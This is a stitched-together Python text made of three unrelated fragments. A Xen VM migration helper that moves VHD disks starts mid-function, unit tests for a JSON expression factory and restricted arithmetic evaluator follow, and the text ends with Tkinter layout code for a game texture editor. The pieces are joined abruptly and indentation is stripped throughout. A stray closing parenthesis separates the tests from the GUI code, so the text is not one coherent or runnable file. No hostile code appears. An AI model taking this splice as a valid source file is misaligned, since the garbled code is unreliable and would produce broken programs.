name_label = self._get_orig_vm_name_label(instance)
VMHelper.set_vm_name_label(self._session, vm_ref, name_label)
finally:
if template_vm_ref:
self._destroy(instance, template_vm_ref,
destroy_kernel_ramdisk=False)
return vdis
def _move_disks(self, instance, disk_info):
"""Move and possibly link VHDs via the XAPI plugin."""
base_copy_uuid = disk_info['base_copy']
new_base_copy_uuid = str(uuid.uuid4())
params = {'instance_uuid': instance['uuid'],
'sr_path': VMHelper.get_sr_path(self._session),
'old_base_copy_uuid': base_copy_uuid,
'new_base_copy_uuid': new_base_copy_uuid}
if 'cow' in disk_info:
cow_uuid = disk_info['cow']
new_cow_uuid = str(uuid.uuid4())
params['old_cow_uuid'] = cow_uuid
params['new_cow_uuid'] = new_cow_uuid
new_uuid = new_cow_uuid
else:
new_uuid = new_base_copy_uuid
self._session.call_plugin('migration', 'move_vhds_into_sr',
{'params': pickle.dumps(params)})
# Now we rescan the SR so we find the VHDs
VMHelper.scan_default_sr(self._session)
# Set name-label so we can find if we need to clean | |
}
},
"value_expression": {
"type": "named",
"name": "test_named_expression"
}
},
context=factory_context
)
expression2 = ExpressionFactory.from_spec(
{
"type": "nested",
"argument_expression": {
"type": "array_index",
"array_expression": {
"type": "property_name",
"property_name": "indices"
},
"index_expression": {
"type": "constant",
"constant": 1
}
},
"value_expression": {
"type": "named",
"name": "test_named_expression"
}
},
context=factory_context
)
self.assertEqual(expression1(doc, evaluation_context), 'my_parent_id')
self.assertEqual(expression2(doc, evaluation_context), 'my_parent_id2')
class IteratorExpressionTest(SimpleTestCase):
def setUp(self):
self.spec = {
"type": "iterator",
"expressions": [
{
"type": "property_name",
"property_name": "p1"
},
{
"type": "property_name",
"property_name": "p2"
},
{
"type": "property_name",
"property_name": "p3"
},
],
"test": {}
}
self.expression = ExpressionFactory.from_spec(self.spec)
def test_basic(self):
self.assertEqual([1, 2, 3], self.expression({'p1': 1, 'p2': 2, 'p3': 3}))
def test_missing_values_default(self):
self.assertEqual([1, 2, None], self.expression({'p1': 1, 'p2': 2}))
def test_missing_values_filtered(self):
spec = copy.copy(self.spec)
spec['test'] = {
'type': 'boolean_expression',
'expression': {
'type': 'identity',
},
'operator': 'not_eq',
'property_value': None,
}
expression = ExpressionFactory.from_spec(spec)
self.assertEqual([1, 2], expression({'p1': 1, 'p2': 2}))
self.assertEqual([1, 3], expression({'p1': 1, 'p3': 3}))
self.assertEqual([1], expression({'p1': 1}))
self.assertEqual([], expression({}))
def test_missing_and_filtered(self):
spec = copy.copy(self.spec)
spec['test'] = {
"type": "not",
"filter": {
'type': 'boolean_expression',
'expression': {
'type': 'identity',
},
'operator': 'in',
'property_value': ['', None],
}
}
expression = ExpressionFactory.from_spec(spec)
self.assertEqual([1], expression({'p1': 1, 'p2': ''}))
def test_type_coercion(self):
spec = copy.copy(self.spec)
spec['expressions'] = [
'2018-01-01',
{
'type': 'constant',
'constant': '2018-01-01',
'datatype': 'date',
},
]
expression = ExpressionFactory.from_spec(spec)
self.assertEqual([date(2018, 1, 1), date(2018, 1, 1)], expression({}))
class RootDocExpressionTest(SimpleTestCase):
def setUp(self):
spec = {
"type": "root_doc",
"expression": {
"type": "property_name",
"property_name": "base_property"
}
}
self.expression = ExpressionFactory.from_spec(spec)
def test_missing_context(self):
self.assertEqual(None, self.expression({
"base_property": "item_value"
}))
def test_not_in_context(self):
self.assertEqual(
None,
self.expression(
{"base_property": "item_value"},
context=EvaluationContext({}, 0)
)
)
def test_comes_from_context(self):
self.assertEqual(
"base_value",
self.expression(
{"base_property": "item_value"},
context=EvaluationContext({"base_property": "base_value"}, 0)
)
)
class RelatedDocExpressionTest(SimpleTestCase):
def setUp(self):
# we have to set the fake database before any other calls
self.patch_cases_database()
self.spec = {
"type": "related_doc",
"related_doc_type": "CommCareCase",
"doc_id_expression": {
"type": "property_name",
"property_name": "parent_id"
},
"value_expression": {
"type": "property_name",
"property_name": "related_property"
}
}
self.expression = ExpressionFactory.from_spec(self.spec)
self.nested_expression = ExpressionFactory.from_spec({
"type": "related_doc",
"related_doc_type": "CommCareCase",
"doc_id_expression": {
"type": "property_name",
"property_name": "parent_id"
},
"value_expression": {
"type": "related_doc",
"related_doc_type": "CommCareCase",
"doc_id_expression": {
"type": "property_name",
"property_name": "parent_id"
},
"value_expression": {
"type": "property_name",
"property_name": "related_property"
}
}
})
def patch_cases_database(self):
def get_case(self_, case_id):
doc = self.database.get(case_id)
if doc is None:
raise CaseNotFound
return Config(to_json=lambda: doc)
get_case_patch = patch.object(CaseAccessors, "get_case", get_case)
get_case_patch.start()
self.addCleanup(get_case_patch.stop)
self.database = {}
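# The tests below populate self.database with {doc_id: doc}; the patched
# get_case() wraps each stored dict in an object exposing to_json(), which is
# the document shape the related_doc expression reads from.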
def test_simple_lookup(self):
related_id = 'related-id'
my_doc = {
'domain': 'test-domain',
'parent_id': related_id,
}
related_doc = {
'domain': 'test-domain',
'related_property': 'foo'
}
self.database = {
'my-id': my_doc,
related_id: related_doc
}
self.assertEqual('foo', self.expression(my_doc, EvaluationContext(my_doc, 0)))
def test_related_doc_not_found(self):
doc = {'parent_id': 'some-missing-id', 'domain': 'whatever'}
self.assertEqual(None, self.expression(doc, EvaluationContext(doc, 0)))
def test_cross_domain_lookups(self):
related_id = 'cross-domain-id'
my_doc = {
'domain': 'test-domain',
'parent_id': related_id,
}
related_doc = {
'domain': 'wrong-domain',
'related_property': 'foo'
}
self.database = {
'my-id': my_doc,
related_id: related_doc
}
self.assertEqual(None, self.expression(my_doc, EvaluationContext(my_doc, 0)))
def test_nested_lookup(self):
related_id = 'nested-id-1'
related_id_2 = 'nested-id-2'
my_doc = {
'domain': 'test-domain',
'parent_id': related_id,
}
related_doc = {
'domain': 'test-domain',
'parent_id': related_id_2,
'related_property': 'foo',
}
related_doc_2 = {
'domain': 'test-domain',
'related_property': 'bar',
}
self.database = {
'my-id': my_doc,
related_id: related_doc,
related_id_2: related_doc_2
}
self.assertEqual('bar', self.nested_expression(my_doc, EvaluationContext(my_doc, 0)))
def test_nested_lookup_cross_domains(self):
related_id = 'cross-nested-id-1'
related_id_2 = 'cross-nested-id-2'
my_doc = {
'domain': 'test-domain',
'parent_id': related_id,
}
related_doc = {
'domain': 'test-domain',
'parent_id': related_id_2,
'related_property': 'foo',
}
related_doc_2 = {
'domain': 'wrong-domain',
'related_property': 'bar',
}
self.database = {
'my-id': my_doc,
related_id: related_doc,
related_id_2: related_doc_2
}
self.assertEqual(None, self.nested_expression(my_doc, EvaluationContext(my_doc, 0)))
def test_fail_on_bad_doc_type(self):
spec = {
"type": "related_doc",
"related_doc_type": "BadDocument",
"doc_id_expression": {
"type": "property_name",
"property_name": "parent_id"
},
"value_expression": {
"type": "property_name",
"property_name": "related_property"
}
}
with self.assertRaises(BadSpecError):
ExpressionFactory.from_spec(spec)
def test_caching(self):
self.test_simple_lookup()
my_doc = self.database.get('my-id')
context = EvaluationContext(my_doc, 0)
self.assertEqual('foo', self.expression(my_doc, context))
my_doc = self.database.get('my-id')
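# Clearing the backing store and evaluating the same expression again still
# returns 'foo', which demonstrates that the related-document lookup is
# cached rather than re-fetched.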
self.database.clear()
self.assertEqual('foo', self.expression(my_doc, context))
class RelatedDocExpressionDbTest(TestCase):
domain = 'related-doc-db-test-domain'
def test_form_lookups(self):
form = create_and_save_a_form(domain=self.domain)
expression = self._get_expression('XFormInstance')
doc = self._get_doc(form.form_id)
self.assertEqual(form.form_id, expression(doc, EvaluationContext(doc, 0)))
def test_case_lookups(self):
case_id = uuid.uuid4().hex
create_and_save_a_case(domain=self.domain, case_id=case_id, case_name='related doc test case')
expression = self._get_expression('CommCareCase')
doc = self._get_doc(case_id)
self.assertEqual(case_id, expression(doc, EvaluationContext(doc, 0)))
def test_other_lookups(self):
user_id = uuid.uuid4().hex
CommCareUser.get_db().save_doc({'_id': user_id, 'domain': self.domain})
expression = self._get_expression('CommCareUser')
doc = self._get_doc(user_id)
self.assertEqual(user_id, expression(doc, EvaluationContext(doc, 0)))
@staticmethod
def _get_expression(doc_type):
return ExpressionFactory.from_spec({
"type": "related_doc",
"related_doc_type": doc_type,
"doc_id_expression": {
"type": "property_name",
"property_name": "related_id"
},
"value_expression": {
"type": "property_name",
"property_name": "_id"
}
})
@classmethod
def _get_doc(cls, id):
return {
'related_id': id,
'domain': cls.domain,
}
@generate_cases([
({}, "a + b", {"a": 2, "b": 3}, 2 + 3),
(
{},
"timedelta_to_seconds(a - b)",
{
"a": "2016-01-01T11:30:00.000000Z",
"b": "2016-01-01T11:00:00.000000Z"
},
30 * 60
),
# supports string manipulation
({}, "str(a)+'text'", {"a": 3}, "3text"),
# context can contain expressions
(
{"age": 1},
"a + b",
{
"a": {
"type": "property_name",
"property_name": "age"
},
"b": 5
},
1 + 5
),
# context variable can itself be evaluation expression
(
{},
"age + b",
{
"age": {
"type": "evaluator",
"statement": "a",
"context_variables": {
"a": 2
}
},
"b": 5
},
5 + 2
),
({}, "a + b", {"a": Decimal(2), "b": Decimal(3)}, Decimal(5)),
({}, "a + b", {"a": Decimal(2.2), "b": Decimal(3.1)}, Decimal(5.3)),
({}, "range(3)", {}, [0, 1, 2]),
])
def test_valid_eval_expression(self, source_doc, statement, context, expected_value):
expression = ExpressionFactory.from_spec({
"type": "evaluator",
"statement": statement,
"context_variables": context
})
# almostEqual handles decimal (im)precision - it means "equal to 7 places"
self.assertAlmostEqual(expression(source_doc), expected_value)
@generate_cases([
# context must be a dict
({}, "2 + 3", "text context"),
({}, "2 + 3", 42),
({}, "2 + 3", []),
# statement must be string
({}, 2 + 3, {"a": 2, "b": 3})
])
def test_invalid_eval_expression(self, source_doc, statement, context):
with self.assertRaises(BadSpecError):
ExpressionFactory.from_spec({
"type": "evaluator",
"statement": statement,
"context_variables": context
})
@generate_cases([
("a + (a*b)", {"a": 2, "b": 3}, 2 + (2 * 3)),
("a-b", {"a": 5, "b": 2}, 5 - 2),
("a+b+c+9", {"a": 5, "b": 2, "c": 8}, 5 + 2 + 8 + 9),
("a*b", {"a": 2, "b": 23}, 2 * 23),
("a*b if a > b else b -a", {"a": 2, "b": 23}, 23 - 2),
("'text1' if a < 5 else 'text2'", {"a": 4}, 'text1'),
("a if a else b", {"a": 0, "b": 1}, 1),
("a if a else b", {"a": False, "b": 1}, 1),
("a if a else b", {"a": None, "b": 1}, 1),
("range(1, a)", {"a": 5}, [1, 2, 3, 4]),
("a or b", {"a": 0, "b": 1}, True),
("a and b", {"a": 0, "b": 1}, False),
# ranges > 100 items aren't supported
("range(200)", {}, None),
("a and not b", {"a": 1, "b": 0}, True),
])
def test_supported_evaluator_statements(self, eq, context, expected_value):
self.assertEqual(eval_statements(eq, context), expected_value)
@generate_cases([
# variables can't be strings
("a + b", {"a": 2, "b": 'text'}),
# missing context, b not defined
("a + (a*b)", {"a": 2}),
# power function not supported
("a**b", {"a": 2, "b": 23}),
# lambda not supported
("lambda x: x*x", {"a": 2}),
# max function not defined
("max(a, b)", {"a": 3, "b": 5}),
# method calls not allowed
('"WORD".lower()', {"a": 5}),
])
def test_unsupported_evaluator_statements(self, eq, context):
with self.assertRaises(InvalidExpression):
eval_statements(eq, context)
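# Built through the ExpressionFactory, the same statement does not raise:
# the evaluator expression swallows the failure and returns None instead.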
expression = ExpressionFactory.from_spec({
"type": "evaluator",
"statement": eq,
"context_variables": context
})
self.assertEqual(expression({}), None)
@generate_cases([
("a/b", {"a": 5, "b": None}, TypeError),
("a/b", {"a": 5, "b": 0}, ZeroDivisionError),
])
def test_errors_in_evaluator_statements(self, eq, context, error_type):
with self.assertRaises(error_type):
eval_statements(eq, context)
expression = ExpressionFactory.from_spec({
"type": "evaluator",
"statement": eq,
"context_variables": context
})
self.assertEqual(expression({}), None)
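# The cases above imply that eval_statements() accepts only a narrow, safe
# subset of Python (arithmetic, comparisons, boolean logic, conditional
# expressions, a capped range(), no attribute access or lambdas). A common way
# to build such a restricted evaluator is to walk the ast instead of calling
# eval(). The sketch below illustrates that technique only; it is not the
# project's implementation, and _ALLOWED_BINOPS/_safe_eval are invented names.
# (ast.Constant assumes Python 3.8+.)
import ast
import operator

_ALLOWED_BINOPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
}

def _safe_eval(statement, variables):
    """Evaluate a small arithmetic statement against a dict of named variables."""
    def _eval(node):
        if isinstance(node, ast.Expression):
            return _eval(node.body)
        if isinstance(node, ast.BinOp) and type(node.op) in _ALLOWED_BINOPS:
            return _ALLOWED_BINOPS[type(node.op)](_eval(node.left), _eval(node.right))
        if isinstance(node, ast.Name) and node.id in variables:
            return variables[node.id]
        if isinstance(node, ast.Constant):  # numbers, strings, booleans
            return node.value
        raise ValueError('unsupported construct: %s' % type(node).__name__)
    return _eval(ast.parse(statement, mode='eval'))

# Example: _safe_eval("a + (a * b)", {"a": 2, "b": 3}) returns 8, while
# _safe_eval("a ** b", {"a": 2, "b": 3}) raises ValueError (Pow is not allowed).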
class TestEvaluatorTypes(SimpleTestCase):
def test_datatype(self):
spec = {
"type": "evaluator",
"statement": '1.0 + a',
"context_variables": {'a': 1.0}
}
self.assertEqual(type(ExpressionFactory.from_spec(spec)({})), float)
spec['datatype'] = 'integer'
self.assertEqual(type(ExpressionFactory.from_spec(spec)({})), int)
class TestFormsExpressionSpec(TestCase):
@classmethod
def setUpClass(cls):
super(TestFormsExpressionSpec, cls).setUpClass()
cls.domain = uuid.uuid4().hex
factory = CaseFactory(domain=cls.domain)
[cls.case] = factory.create_or_update_case(CaseStructure(attrs={'create': True}))
cls.forms = [f.to_json() for f in FormAccessors(cls.domain).get_forms(cls.case.xform_ids)]
# redundant case to create extra forms that shouldn't be in the results for cls.case
[cls.case_b] = factory.create_or_update_case(CaseStructure(attrs={'create': True}))
@classmethod
def tearDownClass(cls):
delete_all_xforms()
delete_all_cases()
super(TestFormsExpressionSpec, cls).tearDownClass()
def _make_expression(self, xmlns=None):
spec = {
"type": "get_case_forms",
"case_id_expression": {
"type": "property_name",
"property_name": "_id"
},
}
if xmlns:
spec['xmlns'] = [xmlns]
return ExpressionFactory.from_spec(spec)
def test_evaluation(self):
expression = self._make_expression()
context = EvaluationContext({"domain": self.domain}, 0)
forms = expression(self.case.to_json(), context)
self.assertEqual(len(forms), 1)
self.assertEqual(forms, self.forms)
def test_wrong_domain(self):
expression = self._make_expression()
context = EvaluationContext({"domain": "wrong-domain"}, 0)
forms = expression(self.case.to_json(), context)
self.assertEqual(forms, [])
def test_correct_xmlns(self):
expression = self._make_expression('http://commcarehq.org/case')
context = EvaluationContext({"domain": self.domain}, 0)
forms = expression(self.case.to_json(), context)
self.assertEqual(len(forms), 1)
self.assertEqual(forms, self.forms)
)
self.datTextureTreeBg.place(relx=0.5, rely=0.5, anchor='center')
self.datTextureTreeFiltersMsg = ttk.Label( self.datTextureTree, text='Either no textures were found, or you have them filtered out.', background='white' )
# Item highlighting. The order of the configs below reflects (but does not dictate) the priority of their application
self.datTextureTree.tag_configure( 'warn', background='#f6c6d7' ) # light red
self.datTextureTree.tag_configure( 'mipmap', background='#d7e1ff' ) # light blue; same as SA tab 'marked' items
# File Tree end
defaultCanvasDimensions = 258 # Default size for the height and width of the texture viewing canvas. 256 + 1px border
self.imageManipTabs = ttk.Notebook(datTabRow2)#, width=330
self.textureTreeImagePane = Tk.Frame(self.imageManipTabs)
self.imageManipTabs.add( self.textureTreeImagePane, text=' Image ', sticky='nsew' )
canvasOptionsPane = ttk.Frame(self.textureTreeImagePane, padding='0 15 0 0')
ttk.Checkbutton( canvasOptionsPane, command=self.updateCanvasGrid, text='Show Grid', variable=generalBoolSettings['showCanvasGrid'] ).pack(side='left', padx=7)
ttk.Checkbutton( canvasOptionsPane, command=updateCanvasTextureBoundary, text='Show Texture Boundary', variable=generalBoolSettings['showTextureBoundary'] ).pack(side='left', padx=7)
canvasOptionsPane.pack()
self.textureDisplayFrame = Tk.Frame(self.textureTreeImagePane) # The border and highlightthickness for the canvas below must be set to 0, so that the canvas has a proper origin of (0, 0).
self.textureDisplay = Tk.Canvas(self.textureDisplayFrame, width=defaultCanvasDimensions, height=defaultCanvasDimensions, borderwidth=0, highlightthickness=0) #, background='blue'
# alternate dynamic imaging technique: http://stackoverflow.com/questions/3482081/tkinter-label-widget-with-image-update
self.textureDisplay.pack( expand=1 ) # fill='both', padx=10, pady=10
self.updateCanvasGrid()
self.textureDisplay.defaultDimensions = defaultCanvasDimensions
self.textureDisplayFrame.pack( expand=1 )
datPreviewPaneBottomRow = Tk.Frame(self.textureTreeImagePane) # This object uses grid alignment for its children so that they're centered and equally spaced amongst each other.
self.previousDatButton = ttk.Label( datPreviewPaneBottomRow, image=self.imageBank('previousDatButton') )
self.previousDatButton.grid( column=0, row=0, ipadx=5, pady=(10, 0), sticky='e' )
self.previousDatText = Tk.StringVar()
ToolTip( self.previousDatButton, textvariable=self.previousDatText, delay=300, location='n' )
datFileDetails = ttk.Labelframe( datPreviewPaneBottomRow, text=' File Details ', labelanchor='n' )
self.datFilesizeText = Tk.StringVar()
self.datFilesizeText.set('File Size: ')
ttk.Label(datFileDetails, textvariable=self.datFilesizeText, width=23)
self.totalTextureSpaceText = Tk.StringVar()
self.totalTextureSpaceText.set('Total Texture Size: ')
ttk.Label(datFileDetails, textvariable=self.totalTextureSpaceText)
self.texturesFoundText = Tk.StringVar()
self.texturesFoundText.set('Textures Found: ')
ttk.Label(datFileDetails, textvariable=self.texturesFoundText)
self.texturesFilteredText = Tk.StringVar()
self.texturesFilteredText.set('Filtered Out: ')
ttk.Label(datFileDetails, textvariable=self.texturesFilteredText)
for widget in datFileDetails.winfo_children():
widget.pack( padx=20, pady=0, anchor='w' )
datFileDetails.grid( column=1, row=0 )
self.nextDatButton = ttk.Label( datPreviewPaneBottomRow, image=self.imageBank('nextDatButton') )
self.nextDatButton.grid( column=2, row=0, ipadx=5, pady=(10, 0), sticky='w' )
self.nextDatText = Tk.StringVar()
ToolTip( self.nextDatButton, textvariable=self.nextDatText, delay=300, location='n' )
datPreviewPaneBottomRow.columnconfigure(0, weight=1)
datPreviewPaneBottomRow.columnconfigure(1, weight=1)
datPreviewPaneBottomRow.columnconfigure(2, weight=1)
datPreviewPaneBottomRow.rowconfigure(0, weight=1)
datPreviewPaneBottomRow.pack(side='bottom', pady=7, fill='x')
# Palette tab
self.palettePane = ttk.Frame( self.imageManipTabs, padding='16 0 0 0' )
self.imageManipTabs.add( self.palettePane, text=' Palette ', state='disabled' )
self.imageManipTabs.bind( '<<NotebookTabChanged>>', self.imageManipTabChanged )
# Left-side column (canvas and bg color changer button)
paletteTabLeftSide = Tk.Frame(self.palettePane)
self.paletteCanvas = Tk.Canvas( paletteTabLeftSide, borderwidth=3, relief='ridge', background='white', width=187, height=405 ) #old height:373
paletteBgColorChanger = ttk.Label( paletteTabLeftSide, text='Change Background Color', foreground='#00F', cursor='hand2' )
self.paletteCanvas.paletteEntries = []
self.paletteCanvas.itemColors = {}
paletteBgColorChanger.bind( '<1>', togglePaletteCanvasColor )
self.paletteCanvas.pack( pady=11, padx=0 )
self.paletteCanvas.entryBorderColor = '#3399ff' # This is the same blue as used for treeview selection highlighting
paletteBgColorChanger.pack()
paletteTabLeftSide.grid( column=0, row=0 )
# Right-side column (palette info)
paletteDetailsFrame = Tk.Frame(self.palettePane)
self.paletteDataText = Tk.StringVar( value='Data Offset:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteDataText ).pack(pady=3)
self.paletteHeaderText = Tk.StringVar( value='Header Offset:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteHeaderText ).pack(pady=3)
self.paletteTypeText = Tk.StringVar( value='Palette Type:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteTypeText ).pack(pady=3)
self.paletteMaxColorsText = Tk.StringVar( value='Max Colors:')
ttk.Label( paletteDetailsFrame, textvariable=self.paletteMaxColorsText ).pack(pady=3)
self.paletteStatedColorsText = Tk.StringVar( value='Stated Colors:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteStatedColorsText ).pack(pady=3)
#self.paletteActualColorsText = Tk.StringVar( value='Actual Colors:' ) # todo:reinstate?
#ttk.Label( paletteDetailsFrame, textvariable=self.paletteActualColorsText ).pack(pady=3)
paletteDetailsFrame.grid( column=1, row=0, pady=60, sticky='n' )
self.palettePane.columnconfigure( 0, weight=1 )
self.palettePane.columnconfigure( 1, weight=2 )
# Add a help button to explain the above
helpText = ( 'Max Colors is the maximum number of colors this texture has space for with its current texture format.\n\n'
'Stated Colors is the number of colors that the palette claims are actually used by the texture (described by the palette data header).\n\n'
'The number of colors actually used may still differ from both of these numbers, especially for very old texture hacks.' )
helpBtn = ttk.Label( self.palettePane, text='?', foreground='#445', cursor='hand2' )
helpBtn.place( relx=1, x=-17, y=18 )
helpBtn.bind( '<1>', lambda e, message=helpText: msg(message, 'Palette Properties') )
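# For example, a CI8-format texture indexes an 8-bit palette, so its Max Colors
# is 2**8 = 256, while the palette data header may state that fewer entries
# (the Stated Colors) are actually in use.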
# Model parts tab
self.modelPropertiesPane = VerticalScrolledFrame( self.imageManipTabs )
self.imageManipTabs.add( self.modelPropertiesPane, text='Model', state='disabled' )
self.modelPropertiesPane.interior.imageDataHeaders = []
self.modelPropertiesPane.interior.nonImageDataHeaders = [] # Not expected
self.modelPropertiesPane.interior.textureStructs = [] # Direct model attachments
self.modelPropertiesPane.interior.headerArrayStructs = [] # Used for animations
self.modelPropertiesPane.interior.unexpectedStructs = []
self.modelPropertiesPane.interior.materialStructs = []
self.modelPropertiesPane.interior.displayObjects = []
self.modelPropertiesPane.interior.hideJointChkBtn = None
self.modelPropertiesPane.interior.polyDisableChkBtn = None
self.modelPropertiesPane.interior.opacityEntry = None
self.modelPropertiesPane.interior.opacityBtn = None
self.modelPropertiesPane.interior.opacityScale = None
# Texture properties tab
self.texturePropertiesPane = VerticalScrolledFrame( self.imageManipTabs )
self.texturePropertiesPane.flagWidgets = [] # Useful for the Flag Decoder to more easily find widgets that need updating
self.imageManipTabs.add( self.texturePropertiesPane, text='Properties', state='disabled' )
self.imageManipTabs.pack( fill='both', expand=1 )
datTabRow2.pack(fill='both', expand=1)
# End of DAT tab row 2, the image tree and info pane.
# Tab 4 | Structural Analysis
self.savTab = ttk.Frame( self.mainTabFrame ) # SAV = Structural Analysis View
self.mainTabFrame.add( self.savTab, text=' Structural Analysis ' )
self.dnd.bindtarget( self.savTab, lambda event: dndHandler( event, 'savTab' ), 'text/uri-list' )
# Create the treeview on the left where structures will be browsed
yScroller = Tk.Scrollbar( self.savTab )
xScroller = Tk.Scrollbar( self.savTab, orient='horizontal' )
self.fileStructureTree = ttk.Treeview( self.savTab, columns='offset', yscrollcommand=yScroller.set, xscrollcommand=xScroller.set, selectmode='extended' )
self.fileStructureTree.heading( '#0', anchor='center' ) # , command=function
self.fileStructureTree.column( '#0', anchor='center', minwidth=200, stretch=True, width=180 ) # "#0" is implicit in the columns definition above.
self.fileStructureTree.heading( 'offset', anchor='center', text='Offset' )
self.fileStructureTree.column( 'offset', anchor='e', minwidth=60, stretch=False, width=76 )
self.fileStructureTree.grid( column=0, row=0, sticky="nsew" )
self.fileStructureTree.tag_configure( 'marked', background='#d7e1ff' ) # light blue; same as mipmap highlight color
# Configure and attach the scrollbars
yScroller.config( command=self.fileStructureTree.yview )
xScroller.config( command=self.fileStructureTree.xview )
yScroller.grid( column=1, row=0, sticky="nsew" )
xScroller.grid( column=0, row=1, columnspan=2, sticky="nsew" )
self.fileStructureTree.yScroller = yScroller
self.fileStructureTree.xScroller = xScroller
# Add treeview event handlers
self.fileStructureTree.bind( '<<TreeviewSelect>>', onStructureTreeSelect )
self.fileStructureTree.bind( '<<TreeviewOpen>>', growStructuralAnalysisTree ) # Occurs when expanding items with children
#self.fileStructureTree.bind( '<Double-1>', onStructureTreeDoubleClick ) # todo: find workaround. some kind of conflict prevents this from working
self.fileStructureTree.bind( "<3>", createStructureTreeContextMenu ) # Right-click
# Create the frame on the right where structure properties will be populated
self.structurePropertiesFrame = VerticalScrolledFrame( self.savTab, width=378 )
self.structurePropertiesFrame.grid( column=2, row=0, sticky="nsew" )
# Configure sizing/resizing behavior of the grid cells
self.savTab.grid_columnconfigure( 0, weight=5 )
self.savTab.grid_columnconfigure( 1, weight=0 )
self.savTab.grid_columnconfigure( 2, weight=1, minsize=378 )
self.savTab.grid_rowconfigure( 0, weight=1 )
# Place the DnD background texture
self.fileStructureTreeBg = Tk.Label( self.fileStructureTree, image=self.imageBank('dndTarget'), borderwidth=0, highlightthickness=0 )
self.fileStructureTreeBg.place( relx=0.5, rely=0.5, anchor='center' )
self.fileStructureTree.allIids = []
# Place the search button (and its hover cursor & text)
self.fileStructureTree.searchBtn = Tk.Label( self.fileStructureTree, image=self.imageBank('searchIcon'), bg='white', borderwidth=0, highlightthickness=0 )
self.fileStructureTree.searchBtn.place( rely=1, x=3, y=-6, anchor='sw' )
self.fileStructureTree.searchBtn.bind( '<1>', lambda event: structSearchWindow() )
self.fileStructureTree.searchBtn.config( cursor='hand2' )
ToolTip( self.fileStructureTree.searchBtn, text='Structure Search (CTRL-F)', delay=500 )
self.structPropFrameWrapLength = 300 # The Label wrap length for text inside the structurePropertiesFrame.
# Tab 5 | Manual Texture Replacement
self.mtrTab = ttk.Frame( self.mainTabFrame )
self.mainTabFrame.add( self.mtrTab, text=' Manual Placement ' )
self.dnd.bindtarget( self.mtrTab, lambda event: dndHandler( event, 'mtrTab' ), 'text/uri-list' )
# MTR tab, row 1
mtrTabRow1 = ttk.Frame( self.mtrTab, padding="12 12 12 0" ) # Left, Top, Right, Bottom
ttk.Label( mtrTabRow1, text=" DAT / USD:" ).pack( side='left' )
datDestinationLabel2 = ttk.Entry( mtrTabRow1, textvariable=self.datDestination ) #, font='TkTextFont'
datDestinationLabel2.pack( side='left', fill='x', expand=1, padx=12 )
mtrTabRow1.pack(fill='x', side='top')
# MTR tab, row 2 | Directions
ttk.Label( self.mtrTab, text="This tab gives you the freedom to write a texture into any exact location."
"\nThat even includes any textures that don't normally appear in the DAT Texture Tree."
"\nYou can riffle through the 'Program Usage.txt' file for information on how to use this." ).pack(pady=9)
# MTR tab, row 3 | Texture input
self.mtrTabRow2 = ttk.Frame(self.mtrTab, padding="12 6 0 0") # Left, Top, Right, Bottom
self.sourceTexturesText = Tk.StringVar()
self.sourceTexturesText.set("Texture(s):\n (0 total)")
ttk.Label(self.mtrTabRow2, textvariable=self.sourceTexturesText).pack(side='left') #.grid(column=1, row=1, sticky='ne')
self.imageTextArea = ScrolledText(self.mtrTabRow2, width=74, height=14, wrap='word', font='TkTextFont')
self.imageTextArea.pack(side='left', fill='x', expand=1, padx=12)
self.imageTextArea.bind('<KeyRelease>', onTextAreaKeyUp)
arrowFont = tkFont.Font(family='Courier', size='8', weight='bold')
##self.imageTextArea.tag_config('offsetArrow', foreground='#0066FF', font=arrowFont)
self.imageTextArea.tag_config('offsetArrow', foreground='#119922', font=arrowFont)
self.imageTextArea.tag_config('successfulOverwrite', background='#99FF99', font='TkTextFont')
self.imageTextArea.tag_config('warningOverwrite', background='#FFFF99', font='TkTextFont')
self.imageTextArea.tag_config('failedOverwrite', background='#FF9999', font='TkTextFont')
mtrBtnFrame = ttk.Frame(self.mtrTabRow2, padding=12)
ttk.Button(mtrBtnFrame, text=" Select Textures ", command=importImageFiles).pack(pady=3)
ttk.Button(mtrBtnFrame, text=" Scan folder \n structure", command=scanFolderStructure).pack(pady=3)
ttk.Button(mtrBtnFrame, text=" Clear Highlighting ", command=clearHighlighting).pack(pady=3)
ttk.Separator(mtrBtnFrame, orient='horizontal').pack(fill='x', padx=6, pady=7)
ttk.Button(mtrBtnFrame, text="Write textures into DAT", command=overwriteImagesManually, width=23).pack(pady=3)
self.mtrSaveBackup = Tk.BooleanVar()
self.mtrSaveBackup.set(1)
ttk.Checkbutton( mtrBtnFrame, text=' Keep a backup of \n the original DAT', variable=self.mtrSaveBackup ).pack()
mtrBtnFrame.pack(side='right')
self.mtrTabRow2.pack(fill='x', anchor='n')
battleFrame = Tk.Frame( self.mtrTab )
ttk.Label( battleFrame, image=self.imageBank('cathedralBattle') ).place( relx=0.5, rely=0.5, anchor='center' )
battleFrame.pack( fill='both', expand=1 )
# Tab 6 | Character Color Converter (CCC)
self.cccTab = ttk.Frame(self.mainTabFrame)
self.mainTabFrame.add(self.cccTab, text=' CCC ')
ttk.Label(self.cccTab, text=' Character Color Converter ', font="-weight bold").pack(pady=23)
cccFileSelectionRow = Tk.Frame(self.cccTab)
ttk.Label(cccFileSelectionRow, text="Step 1 | Choose the source file you'd like to convert." \
"\n\n(If you're on the Disc File Tree, you can right-click \non the file and select 'Set as CCC Source File'.)", wraplength=350).grid(column=0, row=0, padx=15, pady=25)
cccTabRow2RightCell = Tk.Frame(cccFileSelectionRow)
ttk.Button(cccTabRow2RightCell, text=' Within a Disc ', command=cccPointToDiscTab).grid(column=0, row=0)
ttk.Button(cccTabRow2RightCell, text=' Standalone File ', command=lambda: cccSelectStandalone('source')).grid(column=1, row=0)
self.cccSourceCanvas = Tk.Canvas(cccTabRow2RightCell, width=290, height=64, borderwidth=0, highlightthickness=0)
self.cccIdentifiersXPos = 90
self.cccSourceCanvas.create_text( self.cccIdentifiersXPos, 20, anchor='w', font="-weight bold -size 10", fill=self.globalFontColor, text='Character: ')
self.cccSourceCanvas.create_text( self.cccIdentifiersXPos, 44, anchor='w', font="-weight bold -size 10", fill=self.globalFontColor, text='Costume Color: ')
self.cccSourceCanvas.insigniaImage = None
self.cccSourceCanvas.grid(column=0, row=1, columnspan=2, pady=7)
cccTabRow2RightCell.grid(column=1, row=0)
